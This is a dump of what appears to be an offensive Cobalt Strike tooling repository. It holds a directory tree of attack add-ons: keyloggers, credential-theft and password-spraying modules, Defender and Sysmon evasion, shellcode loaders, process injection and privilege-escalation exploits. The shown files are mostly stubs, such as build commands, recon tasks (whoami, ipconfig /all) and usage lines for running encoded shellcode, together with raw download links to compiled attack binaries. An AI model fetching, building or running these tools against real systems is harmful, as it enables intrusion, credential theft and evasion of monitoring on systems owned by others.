├── Cobatl Strike ├── Erebus │ ├── ver.txt │ ├── post │ │ └── SharpShell.exe │ ├── third │ │ └── rdpthief │ │ │ └── RdpThief_x64.tmp │ └── modules │ │ ├── third.cna │ │ └── gather.cna ├── Advanced siem detections │ ├── logic_explained.md │ └── usecase1_cobaltstrike_beaconing │ │ ├── lab_setup.md │ │ └── usecase1_cobaltstrike_beaconing │ │ └── detection_query_spl.md ├── Aggrokatz │ ├── requiremets.txt │ └── bof │ │ ├── howto.txt │ │ └── fileread_x64.o ├── CSSG │ ├── build │ │ └── build.txt │ ├── assets │ │ ├── Encryptor │ │ │ ├── obj │ │ │ │ └── Debug │ │ │ │ │ ├── Encryptor.csproj.CoreCompileInputs.cache │ │ │ │ │ ├── Encryptor.exe │ │ │ │ │ ├── Encryptor.pdb │ │ │ │ │ ├── Encryptor.csproj.AssemblyReference.cache │ │ │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ │ │ └── Encryptor.csproj.FileListAbsolute.txt │ │ │ └── bin │ │ │ │ └── Debug │ │ │ │ ├── Encryptor.exe │ │ │ │ └── Encryptor.pdb │ │ └── Encryptor.exe │ └── CSSG_load.cna ├── Cobalt Strike Dec │ ├── task │ │ ├── task_1.bin │ │ ├── task_3.bin │ │ └── task_2.bin │ ├── CS_Dec.bat │ ├── 安装依赖.bat │ ├── requirements.txt │ ├── out.vir │ └── 笔记图片 │ │ ├── image-20251120182036394.png │ │ ├── image-20251120183734599.png │ │ ├── image-20251120184525198.png │ │ ├── image-20251120185036090.png │ │ ├── image-20251120185247702.png │ │ ├── image-20251120185331891.png │ │ ├── image-20251120185407471.png │ │ ├── image-20251120185526954.png │ │ ├── image-20251120190024068.png │ │ ├── image-20251120190544328.png │ │ └── image-20251120192844335.png ├── Custom C2 Channel Template │ └── examples │ │ └── tcp │ │ └── response.txt ├── RDP Thief │ ├── RdpThief │ │ ├── stdafx.cpp │ │ ├── packages.config │ │ ├── targetver.h │ │ └── stdafx.h │ └── RdpThief_x64.tmp ├── BeLix │ ├── config │ │ └── DATA │ ├── internal │ │ └── tasks.go │ ├── metadata │ │ └── struct.go │ ├── cmd │ │ └── main │ │ │ └── main.go │ ├── encrypt │ │ ├── struct.go │ │ └── utils.go │ ├── requester │ │ └── struct.go │ └── go.mod ├── Cobalt Strike 
MoveKit │ ├── Assemblies │ │ └── EventSub.cs │ └── Aggressor │ │ └── payloadGen.cna ├── killswitch GUI │ ├── Malleable-C2-Profiles │ │ └── googlesearch.profile │ ├── host │ │ └── dnscheckin.cna │ └── cs-install.sh ├── Kerberoast │ ├── requirements.txt │ └── SOURCE │ │ └── Makefile ├── Hidden Desktop │ ├── server │ │ ├── server.h │ │ ├── controlwindow.h │ │ ├── common.h │ │ └── main.c │ ├── client │ │ ├── scmain.h │ │ ├── bfmain.h │ │ ├── LinkOrder.ld │ │ ├── pipe.h │ │ ├── bof │ │ │ ├── start.asm │ │ │ └── main.c │ │ ├── asm │ │ │ ├── x64 │ │ │ │ └── start.asm │ │ │ └── x86 │ │ │ │ └── start.asm │ │ ├── util.h │ │ ├── types.h │ │ ├── args.h │ │ └── common.h │ ├── shared │ │ └── config.h │ └── scripts │ │ └── hashstring.py ├── harleyQu1nn │ └── All_In_One.cna ├── Google CSAgent │ └── target │ │ ├── maven-status │ │ └── maven-compiler-plugin │ │ │ ├── testCompile │ │ │ └── default-testCompile │ │ │ │ └── inputFiles.lst │ │ │ └── compile │ │ │ └── default-compile │ │ │ ├── createdFiles.lst │ │ │ └── inputFiles.lst │ │ ├── GoogleCSAgent.jar │ │ ├── maven-archiver │ │ └── pom.properties │ │ ├── original-GoogleCSAgent.jar │ │ └── classes │ │ └── gca │ │ ├── GoogleCSAgent.class │ │ ├── GoogleAuthenticationTool.class │ │ └── GoogleCSAgent$DefineTransformer.class ├── Aggressor Script 2 │ └── All_In_One.cna ├── C2 Crash │ ├── cc2 │ ├── cc2_64.exe │ └── dict │ │ ├── username.txt │ │ └── process.txt ├── EnumRWX │ ├── bofcompile.bat │ └── enumrwx.o ├── EnumLib │ ├── enumlib.o │ └── bofcompile.bat ├── EnumWSC │ ├── enumwsc.o │ └── bofcompile.bat ├── HideFile │ ├── hidefile.o │ └── bofcompile.bat ├── IdleTime │ ├── idletime.o │ ├── bofcompile.bat │ ├── idletime.h │ └── idletime.cna ├── LoadLib │ ├── loadlib.o │ └── bofcompile.bat ├── PSremote │ ├── psremote.o │ └── bofcompile.bat ├── BOF CredUI │ ├── prompt.png │ ├── command.png │ ├── credui.x64.o │ ├── credui.x86.o │ └── credui.cna ├── EnumFiles │ ├── enumfiles.o │ └── bofcompile.bat ├── ForceLockScreen │ ├── forcelockscreen.h │ 
├── forcelockscreen.o │ ├── bofcompile.bat │ ├── forcelockscreen.c │ └── forcelockscreen.cna ├── BOF DLL Inject │ ├── inject.o │ ├── test32.dll │ ├── test64.dll │ ├── cobalt-strike-mandll.png │ └── inject.cna ├── Cobalt Strike Memory Evasion │ └── SleepObfLoader │ │ └── SleepObfLoader │ │ ├── Shellcode.h │ │ ├── minhook │ │ ├── minhook.x64.lib │ │ └── minhook.x86.lib │ │ └── SleepObfLoader.vcxproj.user ├── CredPrompt │ ├── credprompt.o │ └── bofcompile.bat ├── EnumDotnet │ ├── enumdotnet.o │ ├── bofcompile.bat │ └── enumdotnet.cna ├── EnumDrives │ ├── enumdrives.o │ ├── bofcompile.bat │ └── enumdrives.cna ├── EnumShares │ ├── enumshares.o │ └── bofcompile.bat ├── EnumSysmon │ ├── enumsysmon.o │ └── bofcompile.bat ├── SystemInfo │ ├── systeminfo.o │ ├── bofcompile.bat │ └── systeminfo.cna ├── Webcam BOF │ ├── entry.x64.obj │ ├── WebcamBOF.x64.obj │ ├── WebcamBOF.x86.obj │ ├── WebcamBOF │ │ ├── WebcamBOF.zip │ │ ├── WebcamBOF.x64.obj │ │ └── WebcamBOF.x86.obj │ ├── targetver.h │ └── common │ │ └── anticrash.c ├── bluescreenofjeff │ ├── beaconestablishednote.cna │ ├── beaconid_note.cna │ ├── ps-window-alias.cna │ ├── checkin_jobs_context.cna │ ├── timestamped_activitylog_export.cna │ ├── sleep-down-when-no-operators.cna │ └── slack-notify-beacon.cna ├── Aggressor Script 1 │ ├── beaconestablishednote.cna │ ├── say.cna │ ├── loader.cna │ ├── mimikatz-every-30m.cna │ ├── beaconid_note.cna │ ├── checkin_jobs_context.cna │ ├── guest-to-admin.cna │ ├── timestamped_activitylog_export.cna │ ├── service-reboot.cna │ ├── kits │ │ └── AnnoyKit │ │ │ └── scripts │ │ │ └── annoySongs │ │ │ └── Play-ImperialMarch.ps1 │ └── slack-notify-beacon.cna ├── Aggressor Script 3 │ ├── beaconestablishednote.cna │ ├── beaconid_note.cna │ ├── ps-window-alias.cna │ ├── checkin_jobs_context.cna │ ├── timestamped_activitylog_export.cna │ ├── sleep-down-when-no-operators.cna │ └── slack-notify-beacon.cna ├── BOF SprayAD │ ├── SprayAD.x64.o │ ├── SprayAD.x86.o │ └── SOURCE │ │ └── Makefile ├── 
Elusive Mice │ ├── util │ │ └── hash.exe │ ├── bin │ │ ├── elusiveMice.x64.o │ │ └── elusiveMice.x86.o │ └── Makefile ├── EnumHandles │ ├── enumhandles.o │ └── bofcompile.bat ├── Add User BOF │ ├── dist │ │ ├── iXY2823.PNG │ │ ├── AddUser-Bof.x64.o │ │ └── AddUser-Bof.x86.o │ └── Makefile ├── AddExclusion │ ├── addexclusion.o │ └── bofcompile.bat ├── AddLocalCert │ ├── addlocalcert.o │ └── bofcompile.bat ├── BlindEventlog │ ├── blindeventlog.o │ └── bofcompile.bat ├── Dazzle UP │ ├── dazzleUP.cna │ └── dazzleUP │ │ ├── dazzleUP.vcxproj.user │ │ ├── dazzleUP_Reflective_DLL │ │ └── dazzleUP_Reflective_DLL │ │ │ └── dazzleUP_Reflective_DLL.vcxproj.user │ │ └── headers │ │ ├── exploit_checks │ │ ├── CVE_2019_0836.h │ │ ├── CVE_2019_0841.h │ │ └── CVE_2020_0796.h │ │ └── misconf_checks │ │ └── path_dll_hijack.h ├── DelExclusion │ ├── delexclusion.o │ └── bofcompile.bat ├── DelLocalCert │ ├── dellocalcert.o │ └── bofcompile.bat ├── EnumLocalCert │ ├── enumlocalcert.o │ └── bofcompile.bat ├── EnumWebClient │ ├── enumwebclient.o │ └── bofcompile.bat ├── Hell sHall │ ├── test │ │ ├── Resource.rc │ │ ├── helperfunc.h │ │ └── resource.h │ └── Hell'sHall │ │ ├── Resource.rc │ │ ├── helper │ │ ├── meme.jpg │ │ ├── CypherAES.exe │ │ ├── payload_x64.bin │ │ ├── OEFInjection.exe │ │ ├── output │ │ │ └── payload_x64_blob.enc │ │ └── hasher.py │ │ ├── helperfunc.h │ │ └── resource.h ├── PasswordSpray │ ├── passwordspray.o │ └── bofcompile.bat ├── SilenceSysmon │ ├── silencesysmon.o │ └── bofcompile.bat ├── WiFiPasswords │ ├── wifipasswords.o │ ├── bofcompile.bat │ └── wifipasswords.cna ├── CaptureNetNTLM │ ├── capturenetntlm.o │ └── bofcompile.bat ├── EnumExclusions │ ├── enumexclusions.o │ └── bofcompile.bat ├── Spray AD │ ├── Spray-AD │ │ └── Spray-AD.dll │ └── Src │ │ └── Spray-AD │ │ └── Spray-AD │ │ └── Spray-AD.vcxproj.user ├── AddFirewallRule │ ├── addfirewallrule.o │ ├── bofcompile.bat │ └── addfirewallrule.h ├── DelFirewallRule │ ├── delfirewallrule.o │ ├── bofcompile.bat │ 
└── delfirewallrule.h ├── DllComHijacking │ ├── dllcomhijacking.o │ ├── bofcompile.bat │ └── dllcomhijacking.h ├── DllEnvHijacking │ ├── dllenvhijacking.o │ └── bofcompile.bat ├── EnumSecProducts │ ├── enumsecproducts.o │ └── bofcompile.bat ├── InjectPoolParty │ ├── injectpoolparty.o │ └── bofcompile.bat ├── Portscan BOF │ ├── bin │ │ ├── pingscanner.bof.o │ │ └── portscanner.bof.o │ ├── def_file_gen │ │ └── cmon.py │ └── src │ │ └── trustedsec-bof-print.h ├── AddTaskScheduler │ ├── addtaskscheduler.o │ ├── bofcompile.bat │ └── addtaskschedulerNoSYSTEM.o ├── Beaconator │ ├── images │ │ ├── alaris-console.png │ │ ├── alaris-options.png │ │ ├── option-staged.png │ │ ├── pezor-console.png │ │ ├── pezor-options.png │ │ ├── option-stageless.png │ │ ├── scarecrow-console.png │ │ └── scarecrow-options.png │ └── scripts │ │ └── scarecrow_helper.py ├── DelTaskScheduler │ ├── deltaskscheduler.o │ └── bofcompile.bat ├── EnumTaskScheduler │ ├── enumtaskscheduler.o │ └── bofcompile.bat ├── KeyloggerRawInput │ ├── keyloggerrawinput.o │ ├── bofcompile.bat │ └── keyloggerrawinput-noForeground.o ├── ExecuteCrossSession │ ├── executecrosssession.o │ └── bofcompile.bat ├── No PowerShell trunk │ ├── NoPowerShell.exe.lnk │ ├── NoPowerShell32.dll.lnk │ ├── NoPowerShell64.dll.lnk │ └── DOTNET45 │ │ ├── NoPowerShell.exe.lnk │ │ ├── NoPowerShell32.dll.lnk │ │ ├── NoPowerShell64.dll.lnk │ │ └── readme.txt ├── Cobalt Strike DingtalkBot │ ├── requirements.txt │ └── CS-Dingtalk-Bot.cna ├── BOFs │ └── MiniDumpWriteDump │ │ ├── minidumpwritedump.x64.o │ │ └── Makefile ├── Cobalt Strike Aggressor Kit │ ├── Pictures │ │ ├── logo.png │ │ ├── Diagram-1.png │ │ ├── Diagram-2.png │ │ ├── Diagram-3.png │ │ ├── Diagram-4.png │ │ ├── signal-token.png │ │ ├── New-message-CS.png │ │ ├── locate-example.png │ │ ├── signal-token-2.png │ │ ├── File-Color-Example.png │ │ ├── Sonata-Example-1.png │ │ ├── Sonata-Example-2.png │ │ ├── Web-Hit-Example1.png │ │ ├── CS-Client-Disconnect.png │ │ ├── 
Discord-Linux-Parser.png │ │ ├── Host-File-Clone-Site.png │ │ ├── Keystrokes-Received.png │ │ ├── New-Beacon-Example1.png │ │ ├── New-Screesnhot-taken.png │ │ ├── linux-parser-example.png │ │ ├── Beacon-Tab-Name-Example.png │ │ ├── CWD-Beacon-Bar-Example.png │ │ ├── Process-Color-Example.png │ │ ├── windows-parser-example.png │ │ ├── CS-All-Tabs-Bold-Example.png │ │ ├── CWD-Beacon-Bar-Example-2.png │ │ ├── CWD-Beacon-Bar-Example-Admin.png │ │ ├── Auto-Sleep-Interactive-Example.png │ │ ├── Beacon-Tab-Name-Colors-Example.png │ │ ├── New-CS-Client-Connect-Example1.png │ │ └── Teams-CNA-Linux-Parser-Example.png │ └── Auto │ │ ├── auto-sleep-interactive-for-testing.cna │ │ └── auto-sleep-after-initial-access.cna ├── Sweet Potato CS │ ├── README.md │ ├── app.config │ └── Com │ │ └── IEnumSTATSTG.cs ├── rasta-mouse │ ├── elevate │ │ └── modules │ │ │ ├── cve-2015-1701.x64.dll │ │ │ ├── cve-2015-1701.x86.dll │ │ │ └── cve-2016-0051.x86.dll │ └── loader.cna ├── Adrenaline │ ├── recon │ │ ├── app_count │ │ │ ├── applications_enum.x64.o │ │ │ ├── applications_enum.x86.o │ │ │ └── Makefile │ │ └── netjoin_query │ │ │ └── netjoin_query.x64.o │ ├── env_assessment │ │ ├── wef_detect │ │ │ └── wef_detect.x64.o │ │ ├── aad_ca_policy │ │ │ └── aad_ca_policy.x64.o │ │ ├── applocker_policy │ │ │ └── applocker_policy.x64.o │ │ └── bitlocker_status │ │ │ └── bitlocker_status.x64.o │ ├── defense_detection │ │ ├── asr_status │ │ │ └── asr_status.x64.o │ │ ├── wsc_status │ │ │ ├── wsc_status.x64.o │ │ │ └── wsc_status.x86.o │ │ └── amsi_etw_detect │ │ │ ├── amsi_etw_detect.x64.o │ │ │ └── amsi_etw_detect.x86.o │ ├── cred_access │ │ ├── clipboard_grab │ │ │ ├── clipboard_grab.x64.o │ │ │ └── Makefile │ │ └── window_handles_enum │ │ │ ├── window_handles_enum.x64.o │ │ │ └── Makefile │ └── target_prioritization │ │ └── user_idle │ │ ├── user_idle.x64.o │ │ └── user_idle.x86.o ├── Aggressor CNA │ └── JuickyPotato_DLL │ │ └── JuicyPotato │ │ ├── dump.stg │ │ ├── stdafx.cpp │ │ ├── targetver.h │ 
│ ├── stdafx.h │ │ └── LocalNegotiator.h ├── Cobalt Strike MS17-010 │ └── aggressor.cna ├── Screenshot BOF │ ├── ScreenshotBOF │ │ ├── ScreenshotBOF.x64.obj │ │ └── ScreenshotBOF.x86.obj │ └── common │ │ └── anticrash.c ├── Mory │ └── utils │ │ ├── mimes.js │ │ └── data2blob.js ├── Cobalt Strike CNA │ └── Persistence │ │ └── Modules │ │ ├── Exitservice │ │ └── uinit.exe │ │ ├── AdUserApi │ │ └── HaryyUser.exe │ │ └── FileControler │ │ └── FileControler_x64.dll ├── Venoma │ └── Kobra │ │ ├── Kobra.vcxproj.user │ │ ├── syscalls.asm │ │ └── Ven.h ├── Bypass UAC │ └── Aggressor-Scripts-master │ │ └── UACBypass │ │ └── ExampleAudit.png ├── OperatorsKit │ └── compile-all.bat ├── Cobalt Strike Inject Kit │ └── KIT │ │ └── TartarusGate │ │ ├── bin │ │ ├── process_inject_spawn.x64.o │ │ └── process_inject_explicit.x64.o │ │ └── Makefile ├── Enable WebDAV Client BOF │ └── Makefile ├── Cobalt Strike Process Inject Kit │ ├── process-inject-explicit │ │ ├── packages.config │ │ └── base │ │ │ └── helpers.h │ └── process-inject-spawn │ │ └── base │ │ └── helpers.h ├── Beacon Notifier Discord │ ├── request.py │ └── notify.cna ├── Beacon Killer │ ├── Properties │ │ └── Settings.settings │ ├── DetailForm.cs │ └── Program.cs ├── Log Striker │ └── requirements.txt ├── Nim Beacon │ └── cmd │ │ └── dns.nim ├── Psk │ ├── psk_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Psk.cna ├── Psc │ ├── psc_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Psc.cna ├── Psw │ ├── psw_bof.s1.py │ ├── Psw.cna │ └── SOURCE │ │ └── Makefile ├── Smbinfo │ └── SOURCE │ │ ├── Smbinfo.h │ │ └── Makefile ├── Domaininfo │ ├── Domaininfo_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Domaininfo.cna ├── FortyNorthSecurity │ └── Initial Access │ │ └── Notifications │ │ └── text_aggressor.cna ├── StartWebClient │ ├── StartWebClient_bof.s1.py │ ├── SOURCE │ │ ├── StartWebClient.h │ │ └── Makefile │ └── StartWebClient.cna ├── Cobalt Strike Artifact Kit │ └── Cargo.toml ├── p292 │ └── disableeventvwr.cna ├── BOF Oxide │ 
└── src │ │ └── rust_bof.rs ├── Winver │ ├── Winver_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── Winver.cna ├── offsecginger │ └── custom_payload_generator │ │ └── templates │ │ └── jsp_template.jsp ├── BOF RunPe │ └── Makefile ├── WdToggle │ ├── WdToggle_bof.s1.py │ ├── SOURCE │ │ └── Makefile │ └── WdToggle.cna ├── Sharp Zero Logon │ └── SharpZeroLogon.csproj.user ├── Psm │ └── SOURCE │ │ └── Makefile ├── Psx │ └── SOURCE │ │ └── Makefile ├── morph HTA │ └── banner.txt ├── Askcreds │ └── SOURCE │ │ └── Makefile ├── KerbHash │ └── SOURCE │ │ └── Makefile ├── Klist │ └── SOURCE │ │ └── Makefile ├── Lapsdump │ └── SOURCE │ │ └── Makefile ├── ReconAD │ └── SOURCE │ │ └── Makefile ├── SprayAD │ └── SOURCE │ │ └── Makefile ├── FindObjects │ └── SOURCE │ │ └── Makefile ├── PetitPotam │ └── SOURCE │ │ └── Makefile ├── AddMachineAccount │ └── SOURCE │ │ └── Makefile └── CVE-2022-26923 │ └── SOURCE │ └── Makefile ├── ArtifactKit ├── src │ └── Readme.md ├── src-common │ └── Readme.md ├── RawOutput │ └── Readme.md ├── output │ └── Readme.md ├── beacon_dll │ └── beacon_dll.vcxproj.user ├── beacon_exe │ └── beacon_exe.vcxproj.user ├── beacon_common │ └── beacon_common.vcxproj.user └── beacon_service │ └── beacon_service.vcxproj.user ├── Cobalt Strike Win Exec ├── cmake │ ├── build │ │ ├── build.sh │ │ ├── secret.h │ │ ├── tick.s │ │ └── secret.c │ └── dblt │ │ ├── wbe.deb │ │ └── strike.asm ├── doc │ ├── build │ │ ├── build.sh │ │ ├── secret.h │ │ ├── tick.s │ │ └── secret.c │ └── dblt │ │ ├── wbe.deb │ │ └── strike.asm ├── CMakeLists.txt └── tools │ └── test.sh ├── Loader ├── Doge Loader │ └── local │ │ ├── txt │ │ ├── xor │ │ │ ├── readme.md │ │ │ └── stager.txt │ │ └── readme.md │ │ └── bin │ │ └── readme.md ├── COFF Loader │ ├── BOF │ │ ├── Makefile │ │ └── test64.out │ └── Include │ │ └── utils.h ├── CSx3Ldr │ └── icon.o ├── BOF Loader │ ├── arp.x64.o │ ├── whoami.x64.o │ ├── whoami.x64.o.i64 │ └── Cargo.toml ├── AceLdr │ ├── src │ │ ├── hooks │ │ │ ├── heap.c │ │ │ └── 
hooks.h │ │ ├── retaddr.h │ │ ├── link.ld │ │ ├── asm │ │ │ ├── start.asm │ │ │ └── misc.asm │ │ ├── util.h │ │ └── retaddr.c │ ├── bin │ │ └── AceLdr.cna │ └── scripts │ │ └── hashstring.py ├── Cobalt Strike Crystal Kit │ ├── libtcg.x64.zip │ ├── libtp.x64.zip │ ├── Makefile │ ├── udrl │ │ └── Makefile │ └── postex-udrl │ │ └── Makefile ├── Titan Ldr │ ├── SectionLink.ld │ ├── Labels.h │ ├── Peb.h │ ├── Pe.h │ ├── Hash.h │ ├── hooks │ │ └── DnsQuery_A.h │ ├── Titan.cna │ ├── python3 │ │ └── hashstring.py │ ├── Common.h │ └── asm │ │ ├── x86 │ │ ├── Start.asm │ │ └── GetIp.asm │ │ └── x64 │ │ ├── Start.asm │ │ └── GetIp.asm ├── HellLoader │ └── HellsGate │ │ └── HellsGate │ │ └── HellsGate │ │ ├── HellsGate.vcxproj.user │ │ ├── connector.h │ │ └── hellsgate.asm └── kits │ └── AnnoyKit │ └── scripts │ └── annoySongs │ └── Play-ImperialMarch.ps1 ├── Community KIT └── css │ └── imgs │ └── favicon.ico ├── Mimikatz Kit ├── resources │ ├── mimikatz-min.x64.dll │ ├── mimikatz-min.x86.dll │ ├── mimikatz-full.x64.dll │ ├── mimikatz-full.x86.dll │ ├── mimikatz-chrome.x64.dll │ └── mimikatz-chrome.x86.dll └── mimikatz.cna ├── Cobalt Strike Toolset ├── AggressorScript │ └── nopowershell │ │ └── scripts │ │ └── NoPowerShell.exe └── Kits │ └── ResourceKit │ ├── compress.ps1 │ └── htmlapp2.txt ├── Profile └── Malleable Profiles │ ├── sleepmask-vs │ └── BOF-Template │ │ ├── packages.config │ │ └── base │ │ └── helpers.h │ └── rich_header.py ├── threatexpress └── beacon_webview │ ├── beacons.csv │ └── notes.md ├── Und3rf10w ├── Pushover │ └── pushover-cs └── auto-keylogger.cna ├── VYSEC ├── CACTUSTORCH │ └── banner.txt └── auto-keylog-consent.cna └── Cobalt Strike Zig Artifact Kit └── build.zig /Cobatl Strike/Erebus/ver.txt: -------------------------------------------------------------------------------- 1 | 1.2.3 2 | -------------------------------------------------------------------------------- /Cobatl Strike/Advanced siem detections/logic_explained.md: 
-------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggrokatz/requiremets.txt: -------------------------------------------------------------------------------- 1 | 'pypykatz>=0.4.8' 2 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/build/build.txt: -------------------------------------------------------------------------------- 1 | shellcode build files go here -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/task/task_1.bin: -------------------------------------------------------------------------------- 1 | whoami -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/task/task_3.bin: -------------------------------------------------------------------------------- 1 | tasklist -------------------------------------------------------------------------------- /Cobatl Strike/Custom C2 Channel Template/examples/tcp/response.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/config/DATA: -------------------------------------------------------------------------------- 1 | This folder must contain the config file -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/task/task_2.bin: -------------------------------------------------------------------------------- 1 | ipconfig /all 
-------------------------------------------------------------------------------- /ArtifactKit/src/Readme.md: -------------------------------------------------------------------------------- 1 | Put the contents of your src-main directory here. -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/build.sh: -------------------------------------------------------------------------------- 1 | gcc -o wce wce.c wcexec.s secret.c -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/build.sh: -------------------------------------------------------------------------------- 1 | gcc -o wce wce.c wcexec.s secret.c -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike MoveKit/Assemblies/EventSub.cs: -------------------------------------------------------------------------------- 1 | //Work in progress -------------------------------------------------------------------------------- /Cobatl Strike/killswitch GUI/Malleable-C2-Profiles/googlesearch.profile: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /ArtifactKit/src-common/Readme.md: -------------------------------------------------------------------------------- 1 | Put the contents of your src-common directory here. 
-------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/secret.h: -------------------------------------------------------------------------------- 1 | 2 | int check_password(char* password); -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/secret.h: -------------------------------------------------------------------------------- 1 | 2 | int check_password(char* password); -------------------------------------------------------------------------------- /Cobatl Strike/Kerberoast/requirements.txt: -------------------------------------------------------------------------------- 1 | impacket>=0.9.24 2 | pyasn1>=0.4.8 3 | -------------------------------------------------------------------------------- /Cobatl Strike/Advanced siem detections/usecase1_cobaltstrike_beaconing/lab_setup.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggrokatz/bof/howto.txt: -------------------------------------------------------------------------------- 1 | mingw 2 | 3 | gcc -c fileread.c -o fileread.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/CS_Dec.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | python CS_Dec.py 3 | pause 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/安装依赖.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | pip install -r requirements.txt 3 | pause 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/server.h: -------------------------------------------------------------------------------- 1 | 
#pragma once 2 | 3 | BOOL StartServer( INT port ); 4 | -------------------------------------------------------------------------------- /Loader/Doge Loader/local/txt/xor/readme.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | 4 | ./xor.exe stager.txt 5 | 会生成异或后的xor.txt -------------------------------------------------------------------------------- /ArtifactKit/RawOutput/Readme.md: -------------------------------------------------------------------------------- 1 | This directory will contain the temporary files from the compile process. -------------------------------------------------------------------------------- /Cobatl Strike/harleyQu1nn/All_In_One.cna: -------------------------------------------------------------------------------- 1 | Remaking this completely. Keep an eye out for a version 2 release :) 2 | -------------------------------------------------------------------------------- /Loader/COFF Loader/BOF/Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: bof 3 | 4 | bof: 5 | x86_64-w64-mingw32-gcc -c test.c -o test64.out -------------------------------------------------------------------------------- /Loader/Doge Loader/local/bin/readme.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | ./main.exe [shellcode_Path] 4 | 5 | ./main.exe sc.bin -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 2/All_In_One.cna: -------------------------------------------------------------------------------- 1 | Remaking this completely. 
Keep an eye out for a version 2 release :) 2 | -------------------------------------------------------------------------------- /Loader/CSx3Ldr/icon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/CSx3Ldr/icon.o -------------------------------------------------------------------------------- /Loader/Doge Loader/local/txt/readme.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | ./main.exe [shellcodetxt_xor_path] 4 | 5 | ./main.exe xor.txt 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/scmain.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( B ) DWORD WINAPI InputHandler( PARGS* ppArgs ); 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Advanced siem detections/usecase1_cobaltstrike_beaconing/usecase1_cobaltstrike_beaconing/detection_query_spl.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/cc2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/C2 Crash/cc2 -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 277526e6458b7c0ee0115c49957c0929904d1374 2 | -------------------------------------------------------------------------------- /Loader/BOF Loader/arp.x64.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/BOF Loader/arp.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumRWX/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumrwx.c 4 | move /y enumrwx.obj enumrwx.o -------------------------------------------------------------------------------- /Loader/BOF Loader/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/BOF Loader/whoami.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/cc2_64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/C2 Crash/cc2_64.exe -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/requirements.txt: -------------------------------------------------------------------------------- 1 | pefile 2 | peutils 3 | minidump 4 | pyzipper 5 | colorama 6 | pycryptodome 7 | hexdump 8 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumLib/enumlib.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumLib/enumlib.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumRWX/enumrwx.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumRWX/enumrwx.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumWSC/enumwsc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumWSC/enumwsc.o -------------------------------------------------------------------------------- /Cobatl Strike/HideFile/hidefile.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/HideFile/hidefile.o -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/idletime.o: -------------------------------------------------------------------------------- 